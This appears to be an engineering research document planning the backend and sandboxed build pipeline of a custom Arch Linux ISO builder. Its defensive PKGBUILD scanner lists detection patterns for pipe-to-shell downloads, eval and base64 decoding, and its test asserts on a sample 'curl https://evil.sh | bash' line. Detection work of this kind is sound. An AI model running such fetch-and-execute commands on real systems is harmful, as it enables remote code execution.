Phase 1: Core Infrastructure & Security - Research
Researched: 2026-01-25 Domain: Production backend infrastructure with security-hardened build environment Confidence: HIGH
Summary
Phase 1 establishes the foundation for a secure, production-ready Linux distribution builder platform. The core challenge is building a FastAPI backend that serves user requests quickly (<200ms p95 latency) while orchestrating potentially dangerous ISO builds in isolated sandboxes. The critical security requirement is preventing malicious user-submitted packages from compromising the build infrastructure—a real threat evidenced by the July 2025 CHAOS RAT malware distributed through AUR packages.
The standard approach for 2026 combines proven technologies: FastAPI for async API performance, PostgreSQL 18 for data persistence, Caddy for automatic HTTPS, and systemd-nspawn for build sandboxing. The deterministic build requirement (same configuration → identical ISO hash) demands careful environment control using SOURCE_DATE_EPOCH and fixed locales. This phase must implement security-first architecture because retrofitting sandboxing and reproducibility is nearly impossible.
Primary recommendation: Implement systemd-nspawn sandboxing with network whitelisting from day one, use SOURCE_DATE_EPOCH for deterministic builds, and configure FastAPI with production-grade security middleware (rate limiting, CSRF protection) before handling user traffic.
Standard Stack
Core Infrastructure
| Library | Version | Purpose | Why Standard |
|---|---|---|---|
| FastAPI | 0.128.0+ | Async web framework | Industry standard for Python APIs; markedly higher throughput than sync frameworks for I/O-bound workloads. Native async/await, Pydantic validation, auto-generated OpenAPI docs. |
| Uvicorn | 0.30+ | ASGI server | Production-grade async server. Recent versions include a built-in multi-process supervisor (--workers N), eliminating the need for Gunicorn as a process manager. |
| PostgreSQL | 18.1+ | Primary database | Latest major release (Nov 2025). PG 13 EOL. Async support via asyncpg. ACID guarantees for configuration versioning. |
| asyncpg | 0.28.x | PostgreSQL driver | High-performance async Postgres driver. 3-5x faster than psycopg2 in benchmarks. Note: Pin <0.29.0 to avoid SQLAlchemy 2.0.x compatibility issues. |
| SQLAlchemy | 2.0+ | ORM & query builder | Async support via create_async_engine. Superior type hints in 2.0. Use AsyncAdaptedQueuePool for connection pooling. |
| Alembic | Latest | Database migrations | Official SQLAlchemy migration tool. Essential for schema evolution without downtime. |
Security & Infrastructure
| Library | Version | Purpose | Why Standard |
|---|---|---|---|
| Caddy | 2.x+ | Reverse proxy | Automatic HTTPS via Let's Encrypt. REST API for dynamic route management (critical for ISO download endpoints). Simpler than Nginx for programmatic configuration. |
| systemd-nspawn | Latest | Build sandbox | Lightweight container for process isolation. Namespace-based security: read-only /sys, /proc/sys. Network isolation via --private-network. |
| Pydantic | 2.12.5+ | Data validation | Required by FastAPI (>=2.7.0). V1 deprecated. V2 offers better build-time performance and type safety. |
| pydantic-settings | Latest | Config management | Load configuration from environment variables with type validation. Never commit secrets. |
Security Middleware
| Library | Version | Purpose | When to Use |
|---|---|---|---|
| slowapi | Latest | Rate limiting | Redis-backed rate limiter. Prevents API abuse. Apply per-IP for anonymous, per-user for authenticated. |
| fastapi-csrf-protect | Latest | CSRF protection | Double Submit Cookie pattern. Essential for form submissions. Combine with strict CORS for API-only endpoints. |
| python-multipart | Latest | Form parsing | Required for CSRF token handling in form data. FastAPI dependency for file uploads. |
Development Tools
| Library | Version | Purpose | When to Use |
|---|---|---|---|
| Ruff | Latest | Linter & formatter | Replaces Black, isort, flake8. Rust-based, blazing fast. Zero config needed. Constraint: Use ruff, NOT black/flake8/isort. |
| mypy | Latest | Type checker | Static type checking. Essential with Pydantic and FastAPI. Strict mode recommended. |
| pytest | Latest | Testing framework | Async support via pytest-asyncio. Industry standard. |
| httpx | Latest | HTTP client | Async HTTP client for testing FastAPI endpoints. |
Installation
# Install uv (package manager)
curl -LsSf https://astral.sh/uv/install.sh | sh
# Create virtual environment
uv venv
source .venv/bin/activate
# Core dependencies
# Quote specifiers so the shell does not treat < and > as redirections
uv pip install \
  "fastapi[all]==0.128.0" \
  "uvicorn[standard]>=0.30.0" \
  "sqlalchemy[asyncio]>=2.0.0" \
  "asyncpg<0.29.0" \
  alembic \
  "pydantic>=2.12.0" \
  pydantic-settings \
  slowapi \
  fastapi-csrf-protect \
  python-multipart
# Development dependencies (uv pip install has no dev-group flag; install directly)
uv pip install \
  pytest \
  pytest-asyncio \
  pytest-cov \
  httpx \
  ruff \
  mypy
Architecture Patterns
Recommended Project Structure
backend/
├── app/
│ ├── api/
│ │ ├── v1/
│ │ │ ├── endpoints/
│ │ │ │ ├── auth.py
│ │ │ │ ├── builds.py
│ │ │ │ └── health.py
│ │ │ └── router.py
│ │ └── deps.py # Dependency injection
│ ├── core/
│ │ ├── config.py # pydantic-settings configuration
│ │ ├── security.py # Auth, CSRF, rate limiting
│ │ └── db.py # Database session management
│ ├── db/
│ │ ├── base.py # SQLAlchemy Base
│ │ ├── models/ # Database models
│ │ └── session.py # AsyncSession factory
│ ├── schemas/ # Pydantic request/response models
│ ├── services/ # Business logic
│ │ └── build.py # Build orchestration (Phase 1: stub)
│ └── main.py
├── alembic/ # Database migrations
│ ├── versions/
│ └── env.py
├── tests/
│ ├── api/
│ ├── unit/
│ └── conftest.py
├── Dockerfile
├── pyproject.toml
└── alembic.ini
Pattern 1: Async Database Session Management
What: Create async database sessions per request with proper cleanup.
When to use: Every FastAPI endpoint that queries PostgreSQL.
Example:
# app/core/db.py
from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine, async_sessionmaker
from pydantic_settings import BaseSettings
class Settings(BaseSettings):
database_url: str
pool_size: int = 10
max_overflow: int = 20
pool_timeout: int = 30
pool_recycle: int = 1800 # 30 minutes
settings = Settings()
# Create async engine with connection pooling
engine = create_async_engine(
settings.database_url,
pool_size=settings.pool_size,
max_overflow=settings.max_overflow,
pool_timeout=settings.pool_timeout,
pool_recycle=settings.pool_recycle,
pool_pre_ping=True, # Validate connections before use
echo=False # Set True for SQL logging in dev
)
# Session factory
async_session_maker = async_sessionmaker(
engine,
class_=AsyncSession,
expire_on_commit=False
)
# Dependency for FastAPI
async def get_db() -> AsyncSession:
async with async_session_maker() as session:
yield session
Source: Building High-Performance Async APIs with FastAPI, SQLAlchemy 2.0, and Asyncpg
Pattern 2: Caddy Automatic HTTPS Configuration
What: Configure Caddy as reverse proxy with automatic Let's Encrypt certificates.
When to use: Production deployment requiring HTTPS without manual certificate management.
Example:
# Caddyfile
{
# Admin API for programmatic route management (localhost only)
admin localhost:2019
}
# Automatic HTTPS for domain
api.debate.example.com {
reverse_proxy localhost:8000 {
# Health check
health_uri /health
health_interval 10s
health_timeout 5s
}
# Security headers
header {
Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
X-Content-Type-Options "nosniff"
X-Frame-Options "DENY"
# X-XSS-Protection omitted: the header is deprecated and ignored by modern browsers
}
# Rate limiting (requires caddy-rate-limit plugin)
rate_limit {
zone static {
key {remote_host}
events 100
window 1m
}
}
# Logging
log {
output file /var/log/caddy/access.log
format json
}
}
Programmatic route management (Python):
import httpx
async def add_iso_download_route(build_id: str, iso_path: str):
"""Dynamically add download route via Caddy API."""
config = {
"match": [{"path": [f"/download/{build_id}/*"]}],
"handle": [{
"handler": "file_server",
"root": iso_path,
"hide": [".git"]
}]
}
async with httpx.AsyncClient() as client:
response = await client.post(
"http://localhost:2019/config/apps/http/servers/srv0/routes",
json=config
)
response.raise_for_status()
Source: Caddy Reverse Proxy Documentation, Caddy 2 config for FastAPI
Pattern 3: FastAPI Security Middleware Stack
What: Layer security middleware in correct order for defense-in-depth.
When to use: All production FastAPI applications.
Example:
# app/main.py
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from fastapi.middleware.trustedhost import TrustedHostMiddleware
from slowapi import Limiter, _rate_limit_exceeded_handler
from slowapi.util import get_remote_address
from slowapi.errors import RateLimitExceeded
from app.core.config import settings
from app.api.v1.router import api_router
# Rate limiter
limiter = Limiter(key_func=get_remote_address, default_limits=["100/minute"])
# FastAPI app
app = FastAPI(
title="Debate API",
version="1.0.0",
docs_url="/docs" if settings.environment == "development" else None,
redoc_url="/redoc" if settings.environment == "development" else None,
debug=settings.debug
)
# Middleware order matters: with add_middleware, the LAST middleware added
# becomes the outermost layer (i.e., it runs first on each request)
# 1. Trusted Host (reject requests with invalid Host header)
app.add_middleware(
TrustedHostMiddleware,
allowed_hosts=settings.allowed_hosts # ["api.debate.example.com", "localhost"]
)
# 2. CORS (handle cross-origin requests)
app.add_middleware(
CORSMiddleware,
allow_origins=settings.allowed_origins,
allow_credentials=True,
allow_methods=["GET", "POST", "PUT", "DELETE"],
allow_headers=["*"],
max_age=600 # Cache preflight requests for 10 minutes
)
# 3. Rate limiting
app.state.limiter = limiter
app.add_exception_handler(RateLimitExceeded, _rate_limit_exceeded_handler)
# Include routers
app.include_router(api_router, prefix="/api/v1")
# Health check (no auth, no rate limit)
@app.get("/health")
async def health():
return {"status": "healthy"}
CSRF Protection (separate from middleware, applied to specific endpoints):
# app/core/security.py
from fastapi_csrf_protect import CsrfProtect
from pydantic import BaseModel

from app.core.config import settings

class CsrfSettings(BaseModel):
    secret_key: str = settings.csrf_secret_key
    cookie_samesite: str = "lax"
    cookie_secure: bool = True  # HTTPS only
    cookie_domain: str = settings.cookie_domain

@CsrfProtect.load_config
def get_csrf_config():
    return CsrfSettings()

# Apply to form endpoints
from fastapi import Depends, Request
from fastapi_csrf_protect import CsrfProtect

@app.post("/api/v1/builds")
async def create_build(
    request: Request,
    csrf_protect: CsrfProtect = Depends(),
    db: AsyncSession = Depends(get_db)
):
    # validate_csrf is async in current fastapi-csrf-protect releases
    await csrf_protect.validate_csrf(request)  # Raises 403 if invalid
    # ... build logic
Source: FastAPI Security Guide, FastAPI CSRF Protection
Pattern 4: systemd-nspawn Build Sandbox
What: Isolate archiso builds in systemd-nspawn containers with network whitelisting.
When to use: Every ISO build to prevent malicious packages from compromising host.
Example:
# app/services/sandbox.py
import subprocess
from pathlib import Path
from typing import List
class BuildSandbox:
"""Manages systemd-nspawn sandboxed build environments."""
def __init__(self, container_root: Path, allowed_mirrors: List[str]):
self.container_root = container_root
self.allowed_mirrors = allowed_mirrors
async def create_container(self, build_id: str) -> Path:
"""Create isolated container for build."""
container_path = self.container_root / build_id
container_path.mkdir(parents=True, exist_ok=True)
# Bootstrap minimal Arch Linux environment
subprocess.run([
"pacstrap",
"-c", # Use package cache
"-G", # Avoid copying host pacman keyring
"-M", # Avoid copying host mirrorlist
str(container_path),
"base",
"archiso"
], check=True)
# Configure mirrors (whitelist only)
mirrorlist_path = container_path / "etc/pacman.d/mirrorlist"
mirrorlist_path.write_text("\n".join([
f"Server = {mirror}" for mirror in self.allowed_mirrors
]))
return container_path
async def run_build(
self,
container_path: Path,
profile_path: Path,
output_path: Path
) -> subprocess.CompletedProcess:
"""Execute archiso build in sandboxed container."""
# systemd-nspawn arguments for security
nspawn_cmd = [
"systemd-nspawn",
"--directory", str(container_path),
"--private-network", # No network access (mirrors pre-cached)
"--read-only", # Immutable root filesystem
"--tmpfs", "/tmp:mode=1777", # Writable tmp
"--tmpfs", "/var/tmp:mode=1777",
"--bind", f"{profile_path}:/build/profile:ro", # Profile read-only
"--bind", f"{output_path}:/build/output", # Output writable
"--setenv", f"SOURCE_DATE_EPOCH={self._get_source_date_epoch()}",
"--setenv", "LC_ALL=C", # Fixed locale for determinism
"--setenv", "TZ=UTC", # Fixed timezone
"--capability", "CAP_SYS_ADMIN", # Required for mkarchiso
"--console=pipe", # Capture output
"--quiet",
"--",
"mkarchiso",
"-v",
"-r", # Remove working directory after build
"-w", "/tmp/archiso-work",
"-o", "/build/output",
"/build/profile"
]
        # Execute with timeout. Note: subprocess.run blocks the event loop;
        # in production wrap it in asyncio.to_thread() or use
        # asyncio.create_subprocess_exec.
result = subprocess.run(
nspawn_cmd,
timeout=900, # 15 minute timeout (INFR-02 requirement)
capture_output=True,
text=True
)
return result
    def _get_source_date_epoch(self) -> str:
        """Return fixed timestamp for reproducible builds."""
        # Placeholder: wall-clock time means two runs of the same config will
        # NOT produce identical ISOs. Phase 2 replaces this with the git
        # commit (or repository snapshot) timestamp.
        import time
        return str(int(time.time()))
async def cleanup_container(self, container_path: Path):
"""Remove container after build."""
import shutil
shutil.rmtree(container_path)
Network isolation with allowed mirrors:
For Phase 1, pre-cache packages in the container bootstrap phase. Future enhancement: use --network-macvlan with iptables whitelist rules.
Source: systemd-nspawn ArchWiki, Lightweight Development Sandboxes with systemd-nspawn
Pattern 5: Deterministic Build Configuration
What: Configure build environment for reproducible outputs (same config → identical hash).
When to use: Every ISO build to enable caching and integrity verification.
Example:
# app/services/deterministic.py
import hashlib
import json
from pathlib import Path
from typing import Dict, Any
class DeterministicBuildConfig:
"""Ensures reproducible ISO builds."""
@staticmethod
def compute_config_hash(config: Dict[str, Any]) -> str:
"""
Generate deterministic hash of build configuration.
Critical: Same config must produce same hash for caching.
"""
        # Normalize configuration (sorted keys, consistent formatting)
        normalized = {
            "packages": sorted(config.get("packages", [])),
            "overlays": [
                {
                    "name": overlay["name"],
                    "files": [
                        {
                            "path": f["path"],
                            "content_hash": hashlib.sha256(
                                f["content"].encode()
                            ).hexdigest(),
                        }
                        for f in sorted(overlay.get("files", []), key=lambda x: x["path"])
                    ],
                }
                for overlay in sorted(config.get("overlays", []), key=lambda x: x["name"])
            ],
            "locale": config.get("locale", "en_US.UTF-8"),
            "timezone": config.get("timezone", "UTC"),
        }
# JSON with sorted keys for determinism
config_json = json.dumps(normalized, sort_keys=True)
return hashlib.sha256(config_json.encode()).hexdigest()
@staticmethod
def create_archiso_profile(
config: Dict[str, Any],
profile_path: Path,
source_date_epoch: int
):
"""
Generate archiso profile with deterministic settings.
Key determinism factors:
- SOURCE_DATE_EPOCH: Fixed timestamps in filesystem
- LC_ALL=C: Fixed locale for sorting
- TZ=UTC: Fixed timezone
- Sorted package lists
- Fixed compression settings
"""
profile_path.mkdir(parents=True, exist_ok=True)
# packages.x86_64 (sorted for determinism)
packages_file = profile_path / "packages.x86_64"
packages = sorted(config.get("packages", []))
packages_file.write_text("\n".join(packages) + "\n")
# profiledef.sh
profiledef = profile_path / "profiledef.sh"
profiledef.write_text(f"""#!/usr/bin/env bash
# Deterministic archiso profile
iso_name="debate-custom"
iso_label="DEBATE_$(date --date=@{source_date_epoch} +%Y%m)"
iso_publisher="Debate Platform <https://debate.example.com>"
iso_application="Debate Custom Linux"
iso_version="$(date --date=@{source_date_epoch} +%Y.%m.%d)"
install_dir="arch"
bootmodes=('bios.syslinux.mbr' 'bios.syslinux.eltorito' 'uefi-x64.systemd-boot.esp' 'uefi-x64.systemd-boot.eltorito')
arch="x86_64"
pacman_conf="pacman.conf"
airootfs_image_type="squashfs"
airootfs_image_tool_options=('-comp' 'xz' '-Xbcj' 'x86' '-b' '1M' '-Xdict-size' '1M')
# Deterministic file permissions
file_permissions=(
["/etc/shadow"]="0:0:0400"
["/root"]="0:0:750"
["/etc/gshadow"]="0:0:0400"
)
""")
        # pacman.conf (use fixed mirrors)
        pacman_conf = profile_path / "pacman.conf"
        pacman_conf.write_text("""\
[options]
Architecture = auto
CheckSpace
SigLevel = Required DatabaseOptional
LocalFileSigLevel = Optional

[core]
Include = /etc/pacman.d/mirrorlist

[extra]
Include = /etc/pacman.d/mirrorlist
""")
# airootfs structure
airootfs = profile_path / "airootfs"
airootfs.mkdir(exist_ok=True)
# Apply overlay files
for overlay in config.get("overlays", []):
for file_config in overlay.get("files", []):
file_path = airootfs / file_config["path"].lstrip("/")
file_path.parent.mkdir(parents=True, exist_ok=True)
file_path.write_text(file_config["content"])
Source: archiso deterministic builds merge request, SOURCE_DATE_EPOCH specification
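Since the hash is taken over a canonical JSON form, reordering keys or package lists must not change it. A quick standalone self-check of that property (a simplified sketch mirroring the normalization above, not the full class):

```python
import hashlib
import json

def config_hash(config: dict) -> str:
    """Hash a canonical form: sorted package list, sorted JSON keys."""
    normalized = {
        "packages": sorted(config.get("packages", [])),
        "locale": config.get("locale", "en_US.UTF-8"),
    }
    return hashlib.sha256(
        json.dumps(normalized, sort_keys=True).encode()
    ).hexdigest()

a = config_hash({"packages": ["vim", "base"], "locale": "en_US.UTF-8"})
b = config_hash({"locale": "en_US.UTF-8", "packages": ["base", "vim"]})
assert a == b  # neither key order nor package order affects the hash
```

Running this as a unit test guards the caching layer against accidental non-canonical inputs.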
Don't Hand-Roll
Problems with existing battle-tested solutions:
| Problem | Don't Build | Use Instead | Why |
|---|---|---|---|
| HTTPS certificate management | Custom Let's Encrypt client | Caddy with automatic HTTPS | Certificate renewal, OCSP stapling, HTTP challenge handling. Caddy handles all edge cases. |
| API rate limiting | Token bucket from scratch | slowapi or fastapi-limiter | Distributed rate limiting across workers, Redis backend, bypass for trusted IPs, multiple rate limit tiers. |
| CSRF protection | Custom token generation | fastapi-csrf-protect | Double Submit Cookie pattern, token rotation, SameSite cookie handling, timing-attack prevention. |
| Database connection pooling | Manual connection management | SQLAlchemy AsyncAdaptedQueuePool | Connection health checks, overflow handling, timeout management, prepared statement caching. |
| Container isolation | chroot or custom namespaces | systemd-nspawn | Namespace isolation, cgroup resource limits, capability dropping, read-only filesystem enforcement. |
| Async database drivers | Synchronous psycopg2 with thread pool | asyncpg | Native async protocol, connection pooling, prepared statements, type inference, 3-5x faster. |
Key insight: Security and infrastructure code has subtle failure modes that only surface under load or attack. Use proven libraries with years of production hardening.
Common Pitfalls
Pitfall 1: Unsandboxed Build Execution (CRITICAL)
What goes wrong: User-submitted packages execute arbitrary code during build with full system privileges, allowing compromise of build infrastructure.
Why it happens: Developers assume package builds are safe or underestimate risk. archiso's mkarchiso runs without sandboxing by default.
Real-world incident: July 2025 CHAOS RAT malware distributed through AUR packages (librewolf-fix-bin, firefox-patch-bin) using .install scripts to execute remote code.
How to avoid:
- NEVER run archiso builds directly on host system
- Use systemd-nspawn with `--private-network` and `--read-only` flags
- Run builds in ephemeral containers (destroy after completion)
- Implement network egress filtering (whitelist official Arch mirrors only)
- Static analysis on PKGBUILD files: detect `curl | bash`, `eval`, base64 encoding
- Monitor build processes for unexpected network connections
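The static-analysis bullet can start life as a simple regex scan over PKGBUILD text. A sketch (the pattern list is illustrative, not a complete detector, and the function name is hypothetical):

```python
import re

# (pattern, human-readable label) pairs for a first-pass scan
SUSPICIOUS_PATTERNS = [
    (r"curl[^|\n]*\|\s*(ba)?sh", "pipe-to-shell download"),
    (r"\beval\b", "eval of dynamic content"),
    (r"base64\s+(-d|--decode)", "base64-decoded payload"),
]

def scan_pkgbuild(text: str) -> list[str]:
    """Return human-readable findings for suspicious constructs."""
    findings = []
    for pattern, label in SUSPICIOUS_PATTERNS:
        if re.search(pattern, text):
            findings.append(label)
    return findings

assert scan_pkgbuild("source=(...)\ncurl https://evil.sh | bash") == ["pipe-to-shell download"]
assert scan_pkgbuild("makedepends=(gcc)") == []
```

Builds whose PKGBUILDs produce findings would be queued for manual review rather than rejected outright.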
Warning signs:
- Build makes outbound connections to non-mirror IPs
- PKGBUILD contains base64 encoding or eval statements
- Build duration significantly longer than expected
- Unexpected filesystem modifications outside working directory
Phase to address: Phase 1 - Build sandboxing must be architected from the start. Retrofitting is nearly impossible.
Pitfall 2: Non-Deterministic Builds
What goes wrong: Same configuration generates different ISO hashes, breaking caching and integrity verification.
Why it happens: Timestamps in artifacts, non-deterministic file ordering, leaked environment variables, parallel build race conditions.
How to avoid:
- Set `SOURCE_DATE_EPOCH` environment variable for all builds
- Use `LC_ALL=C` for consistent sorting and locale
- Set `TZ=UTC` for timezone consistency
- Sort all input lists (packages, files) before processing
- Use fixed compression settings in archiso profile
- Pin archiso version (don't use rolling latest)
- Test: build same config twice, compare SHA256 hashes
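The double-build test from the last bullet reduces to a streaming file-hash comparison; `builds_are_deterministic` below is a hypothetical helper for a CI job that runs mkarchiso twice on the same profile:

```python
import hashlib
from pathlib import Path

def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream-hash a file so multi-GiB ISOs are not loaded into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        while chunk := f.read(chunk_size):
            digest.update(chunk)
    return digest.hexdigest()

def builds_are_deterministic(iso_a: Path, iso_b: Path) -> bool:
    """Two builds of the same config must produce byte-identical ISOs."""
    return sha256_file(iso_a) == sha256_file(iso_b)
```

In CI, build the same profile twice and fail the pipeline when `builds_are_deterministic` returns False.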
Detection:
- Automated testing: duplicate builds with checksum comparison
- Monitor cache hit rate (sudden drops indicate non-determinism)
- Track build output size variance for identical configs
Phase to address: Phase 1 - Reproducibility must be designed into build pipeline from start.
Source: Reproducible builds documentation
Pitfall 3: Connection Pool Exhaustion
What goes wrong: Under load, API exhausts PostgreSQL connections. New requests fail with "connection pool timeout" errors.
Why it happens: Default pool_size (5) too small for async workloads. Not using pool_pre_ping to detect stale connections. Long-running queries hold connections.
How to avoid:
- Set `pool_size=10`, `max_overflow=20` for production
- Enable `pool_pre_ping=True` to validate connections
- Set `pool_recycle=1800` (30 min) to refresh connections
- Use `pool_timeout=30` to fail fast
- Pin `asyncpg<0.29.0` to avoid SQLAlchemy 2.0.x compatibility issues
- Monitor connection pool metrics (active, idle, overflow)
Detection:
- Alert on "connection pool timeout" errors
- Monitor connection pool utilization (should stay <80%)
- Track query duration p95 (detect slow queries holding connections)
Phase to address: Phase 1 - Configure properly during initial database setup.
Source: Handling PostgreSQL Connection Limits in FastAPI
Pitfall 4: Interactive Docs Left Enabled in Production
What goes wrong: Developers leave /docs and /redoc enabled in production, exposing API schema to attackers.
Why it happens: Convenient during development, forgotten in production. No environment-based toggle.
How to avoid:
- Disable docs in production: `docs_url=None if settings.environment == "production" else "/docs"`
- Or require authentication for docs endpoints
- Use environment variables to control feature flags
Detection:
- Security audit: check whether `/docs` is accessible without auth in production
Phase to address: Phase 1 - Configure during initial FastAPI setup.
Source: FastAPI Production Checklist
Pitfall 5: Insecure Default Secrets
What goes wrong: Using hardcoded or weak secrets for JWT signing, CSRF tokens, or database passwords. Attackers exploit to forge tokens or access database.
Why it happens: Copy-paste from tutorials. Not using environment variables. Committing .env files.
How to avoid:
- Generate strong secrets: `openssl rand -hex 32`
- Load from environment variables via pydantic-settings
- NEVER commit secrets to git
- Use secret management services (AWS Secrets Manager, HashiCorp Vault) in production
- Rotate secrets periodically
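In Python, the `openssl rand -hex 32` step and a startup-time sanity check might look like this (the weak-default list is illustrative):

```python
import secrets

def generate_secret() -> str:
    """256-bit hex secret, equivalent to `openssl rand -hex 32`."""
    return secrets.token_hex(32)

def is_strong_secret(value: str, min_hex_chars: int = 64) -> bool:
    """Reject short or obviously-default secrets before serving traffic."""
    weak_defaults = {"changeme", "secret", "password"}
    return len(value) >= min_hex_chars and value.lower() not in weak_defaults

key = generate_secret()
assert len(key) == 64 and is_strong_secret(key)
assert not is_strong_secret("changeme")
```

Calling a check like `is_strong_secret` in the pydantic-settings validator turns a weak secret into a startup failure instead of a silent vulnerability.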
Detection:
- Git pre-commit hook: scan for hardcoded secrets
- Security audit: check for weak or default credentials
Phase to address: Phase 1 - Establish secure configuration management from start.
Source: FastAPI Security FAQs
Code Examples
Database Migrations with Alembic
# Initialize Alembic
alembic init alembic
# Create first migration
alembic revision --autogenerate -m "Create initial tables"
# Apply migrations
alembic upgrade head
# Rollback
alembic downgrade -1
Alembic env.py configuration for async:
# alembic/env.py
from logging.config import fileConfig
from sqlalchemy import pool
from sqlalchemy.ext.asyncio import async_engine_from_config
from alembic import context
from app.core.config import settings
from app.db.base import Base # Import all models
config = context.config
config.set_main_option("sqlalchemy.url", settings.database_url)
target_metadata = Base.metadata
def run_migrations_offline():
"""Run migrations in 'offline' mode."""
context.configure(
url=settings.database_url,
target_metadata=target_metadata,
literal_binds=True,
dialect_opts={"paramstyle": "named"},
)
with context.begin_transaction():
context.run_migrations()
async def run_migrations_online():
"""Run migrations in 'online' mode."""
connectable = async_engine_from_config(
config.get_section(config.config_ini_section),
prefix="sqlalchemy.",
poolclass=pool.NullPool,
)
    async with connectable.connect() as connection:
        await connection.run_sync(do_run_migrations)
    await connectable.dispose()
def do_run_migrations(connection):
context.configure(connection=connection, target_metadata=target_metadata)
with context.begin_transaction():
context.run_migrations()
if context.is_offline_mode():
run_migrations_offline()
else:
import asyncio
asyncio.run(run_migrations_online())
Source: FastAPI with Async SQLAlchemy and Alembic
PostgreSQL Backup Script
#!/bin/bash
# Daily PostgreSQL backup with retention
BACKUP_DIR="/var/backups/postgres"
RETENTION_DAYS=30
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
DB_NAME="debate"
# Create backup directory
mkdir -p "$BACKUP_DIR"
# Backup database
pg_dump -U postgres -Fc -b -v -f "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump" "$DB_NAME"
# Compress backup
gzip "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump"
# Delete old backups
find "$BACKUP_DIR" -name "${DB_NAME}_*.dump.gz" -mtime +$RETENTION_DAYS -delete
# Verify backup integrity
gunzip -t "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump.gz" && echo "Backup verified"
# Test restore (weekly)
if [ "$(date +%u)" -eq 1 ]; then
    echo "Testing weekly restore..."
    createdb -U postgres "${DB_NAME}_test"
    # pg_restore cannot read gzip directly; decompress on the fly
    gunzip -c "$BACKUP_DIR/${DB_NAME}_${TIMESTAMP}.dump.gz" | pg_restore -U postgres -d "${DB_NAME}_test"
    dropdb -U postgres "${DB_NAME}_test"
fi
Cron schedule:
# Daily backup at 2 AM
0 2 * * * /usr/local/bin/postgres-backup.sh >> /var/log/postgres-backup.log 2>&1
Source: PostgreSQL Backup Best Practices
Health Check Endpoint
# app/api/v1/endpoints/health.py
from fastapi import APIRouter, Depends
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import text
from app.core.db import get_db
router = APIRouter()
@router.get("/health")
async def health_check():
"""Basic health check (no database)."""
return {"status": "healthy"}
@router.get("/health/db")
async def health_check_db(db: AsyncSession = Depends(get_db)):
"""Health check with database connection test."""
try:
result = await db.execute(text("SELECT 1"))
result.scalar()
return {"status": "healthy", "database": "connected"}
except Exception as e:
return {"status": "unhealthy", "database": "error", "error": str(e)}
State of the Art
| Old Approach | Current Approach (2026) | When Changed | Impact |
|---|---|---|---|
| Gunicorn + Uvicorn workers | Uvicorn `--workers` flag | Uvicorn 0.30 (2024) | Simpler deployment, one less dependency |
| psycopg2 (sync) | asyncpg | SQLAlchemy 2.0 (2023) | 3-5x faster, native async, better type hints |
| Pydantic v1 | Pydantic v2 | Pydantic 2.0 (2023) | Better performance, Python 3.14 compatibility |
| chroot for isolation | systemd-nspawn | ~2015 | Full namespace isolation, cgroup limits |
| Manual Let's Encrypt | Caddy automatic HTTPS | Caddy 2.0 (2020) | Zero-config certificates, automatic renewal |
| Nginx config files | Caddy REST API | Caddy 2.0 (2020) | Programmatic route management |
| asyncpg 0.29+ | Pin asyncpg <0.29.0 | 2024 | SQLAlchemy 2.0.x compatibility issues |
Deprecated/outdated:
- Gunicorn as ASGI manager: Uvicorn 0.30+ has built-in multi-process supervisor
- Pydantic v1: Deprecated, Python 3.14+ incompatible
- psycopg2 for async FastAPI: Use asyncpg for 3-5x performance improvement
- chroot for sandboxing: Insufficient isolation; use systemd-nspawn or containers
Open Questions
1. Network Isolation Strategy for systemd-nspawn
What we know:
- systemd-nspawn `--private-network` completely isolates the container from the network
- archiso's mkarchiso needs to download packages from mirrors
- User overlays may reference external packages (SSH keys, configs fetched from GitHub)
What's unclear:
- Best approach for whitelisting Arch mirrors while blocking other network access
- Whether to pre-cache all packages (slow bootstrap, guaranteed isolation) vs. allow outbound to whitelisted mirrors (faster, more complex)
- How to handle private overlays requiring external resources
Recommendation:
- Phase 1: Pre-cache packages during container bootstrap. Use `--private-network` for complete isolation.
- Future enhancement: Implement an HTTP proxy with a whitelist, or use `--network-macvlan` with iptables rules
Confidence: MEDIUM - No documented pattern for systemd-nspawn + selective network access
2. Build Timeout Threshold
What we know:
- INFR-02 requirement: ISO build completes within 15 minutes
- Context decision: Claude's discretion on timeout handling (soft warning vs hard kill, duration)
What's unclear:
- What percentage of builds complete within 15 minutes vs. require longer?
- Should timeout be configurable per build size (small overlay vs. full desktop environment)?
- Soft warning (allow continuation with user consent) vs. hard kill?
Recommendation:
- Phase 1: Hard timeout at 20 minutes (133% of target) with warning at 15 minutes
- Phase 2: Collect metrics, tune threshold based on actual build distribution
- Allow extended timeout for authenticated users or specific overlay combinations
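The soft-warning/hard-kill split can be sketched with asyncio (timeouts shortened for illustration; production values would be the 15- and 20-minute marks above, and `run_with_deadlines` is a hypothetical name):

```python
import asyncio

async def run_with_deadlines(coro, soft_s: float, hard_s: float, warn):
    """Run coro; emit a warning at soft_s, hard-kill at hard_s."""
    task = asyncio.ensure_future(coro)
    try:
        # shield() keeps the build alive when only the soft deadline fires
        return await asyncio.wait_for(asyncio.shield(task), timeout=soft_s)
    except asyncio.TimeoutError:
        warn(f"build exceeded soft limit of {soft_s}s")
    try:
        # grace period up to the hard limit; wait_for cancels the task on expiry
        return await asyncio.wait_for(task, timeout=hard_s - soft_s)
    except asyncio.TimeoutError:
        raise RuntimeError("build killed at hard limit")

async def _demo():
    warnings = []
    # Finishes between the soft and hard limits: one warning, result returned
    value = await run_with_deadlines(
        asyncio.sleep(0.05, result="iso-ready"),
        soft_s=0.01, hard_s=0.2, warn=warnings.append,
    )
    return value, warnings

result, warnings = asyncio.run(_demo())
assert result == "iso-ready" and len(warnings) == 1
```

The same wrapper can surround the sandboxed mkarchiso invocation once it runs as an async subprocess.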
Confidence: LOW - Depends on real-world build performance data
3. Cache Invalidation Strategy
What we know:
- Deterministic builds enable caching (same config → same hash)
- Arch is rolling release (packages update daily)
- Cached ISOs may contain outdated/vulnerable packages
What's unclear:
- Time-based expiry (e.g., max 7 days) vs. package version tracking?
- How to detect when upstream packages update and invalidate cache?
- Balance between cache efficiency and package freshness
Recommendation:
- Phase 1: Simple approach: no caching (always build fresh)
- Phase 2: Time-based cache expiry (7 days max)
